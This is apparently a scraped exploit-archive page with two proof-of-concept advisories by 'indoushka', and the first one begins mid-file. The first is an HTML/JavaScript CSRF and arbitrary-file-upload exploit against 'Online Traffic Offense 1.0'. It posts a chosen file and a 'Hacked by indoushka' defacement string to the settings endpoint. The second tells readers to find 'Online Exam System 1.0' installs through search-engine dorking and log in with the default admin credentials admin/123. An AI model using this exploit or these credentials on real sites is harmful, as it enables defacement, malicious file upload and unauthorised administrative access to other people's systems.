onclick="uploadFile()">Upload File</button>    </form>    <script>        function uploadFile() {            const fileInput = document.getElementById('fileInput').files[0];            if (!fileInput) {                alert('Please select a file.');                return;            }            const formData = new FormData();            formData.append('name', '<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>');            formData.append('img', fileInput);            console.log("(+) Uploading file...");            fetch('http://127.0.0.1/traffic_offense/classes/SystemSettings.php?f=update_settings', { // Replace with your upload URL                method: 'POST',                body: formData            })            .then(response => response.text())            .then(data => {                if (data === '1') {                    console.log("(+) File upload seems to have been successful!");                } else {                    console.log("(-) Oh no, the file upload seems to have failed!");                }            })            .catch(error => console.error("(-) Error during file upload:", error));        }    </script></body></html>        Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Online Traffic Offense 1.0 CSRF / Arbitrary File Upload

Online Exam System version 1.0 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : Online Exam System  1.0 Insecure Settings Vulnerability                                                            || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://www.kashipara.com/project/download/project2/user/2024/202406/kashipara.com_exam-zip.zip                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload :     Username: admin      Password: 123[+] http://127.0.0.1/exam/admin/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Tag

#windows